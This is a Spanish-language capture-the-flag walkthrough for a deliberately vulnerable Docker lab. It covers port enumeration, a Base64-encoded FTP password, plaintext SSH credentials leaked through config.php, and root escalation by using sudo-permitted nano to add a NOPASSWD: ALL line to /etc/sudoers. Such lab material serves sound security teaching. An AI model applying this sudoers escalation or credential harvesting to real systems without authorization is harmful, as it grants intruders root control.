# 🏴‍☠️ FTP LAB SJD – Walkthrough Completo

Laboratorio Docker vulnerable para practicar **hacking ético**, **enumeración**, **explotación de servicios** y **escalada de privilegios**.

---

## 🎯 Objetivo

Obtener acceso **root** y leer la bandera:

/home/sjd/hacker.txt

yaml
Copiar código

---

## 🚀 Despliegue del laboratorio

```bash
docker build -t ftp-lab-sjd .
docker run -d --name ftp-lab \
  -p 80:80 \
  -p 2021:2021 \
  -p 2022:2022 \
  ftp-lab-sjd
IP del contenedor (ejemplo):

Copiar código
172.17.0.2
1️⃣ Enumeración inicial
Escaneo de puertos
bash
Copiar código
nmap -p- 172.17.0.2
Resultado
text
Copiar código
PORT     STATE SERVICE
80/tcp   open  http
2021/tcp open  ftp
2022/tcp open  ssh
2️⃣ Enumeración Web (Puerto 80)
Acceso al sitio
bash
Copiar código
curl http://172.17.0.2
Contenido encontrado
El sitio muestra una pista:

makefile
Copiar código
El usuario ftp está encriptado en Base64
Y2lydWVsYQ==
Decodificación Base64
bash
Copiar código
echo Y2lydWVsYQ== | base64 -d
Resultado:

nginx
Copiar código
ciruela
➡ Contraseña del usuario ftp

3️⃣ Acceso FTP (Puerto 2021)
bash
Copiar código
ftp 172.17.0.2 2021
Credenciales:

makefile
Copiar código
usuario: ftp
password: ciruela
Enumeración FTP
bash
Copiar código
ls -la
cat welcome.msg
El servidor FTP permite lectura de archivos y está mal configurado.

4️⃣ Nueva enumeración Web
Archivo sensible expuesto
bash
Copiar código
curl http://172.17.0.2/config.php
Resultado
php
Copiar código
<?php $user='karina'; $pass='estrella'; ?>
➡ Credenciales en texto plano.

5️⃣ Acceso por SSH (Puerto 2022)
bash
Copiar código
ssh karina@172.17.0.2 -p 2022
Password:

nginx
Copiar código
estrella
Acceso exitoso como karina.

6️⃣ Enumeración como karina
Información del sistema
bash
Copiar código
whoami
id
hostname
uname -a
Archivos del usuario
bash
Copiar código
ls -la ~
cat ~/.bash_history
Salida relevante:

text
Copiar código
sudo su
cat /home/sjd/hacker.txt
➡ Indica intento previo de escalada y la existencia de la bandera.

7️⃣ Análisis de permisos sudo
bash
Copiar código
sudo -l
Resultado:

text
Copiar código
User karina may run the following commands:
(ALL) NOPASSWD: /bin/nano
🚨 Vulnerabilidad crítica
Nano ejecutado como root permite modificar archivos del sistema.

8️⃣ Escalada de privilegios (nano – GTFOBins)
Abrir sudoers como root
bash
Copiar código
sudo nano /etc/sudoers
Agregar al final del archivo
text
Copiar código
karina ALL=(ALL) NOPASSWD: ALL
Guardar y salir:

objectivec
Copiar código
CTRL + O
ENTER
CTRL + X
9️⃣ Acceso root
bash
Copiar código
sudo su
Verificación:

bash
Copiar código
whoami
Resultado:

nginx
Copiar código
root
🏁 Bandera
bash
Copiar código
cat /home/sjd/hacker.txt
🎉 CTF COMPLETADO

🧨 Vulnerabilidades explotadas
Información sensible expuesta en web

Uso de Base64 como falsa seguridad

FTP inseguro

Credenciales hardcodeadas

Historial bash con pistas

Configuración incorrecta de sudo

Escalada usando nano (GTFOBins)

⚠️ Disclaimer
Este laboratorio fue creado exclusivamente con fines educativos.
No utilizar estas técnicas en sistemas sin autorización.

👤 Autor
SJD
Hacking Ético · Linux · Docker
Argentina 🇦🇷
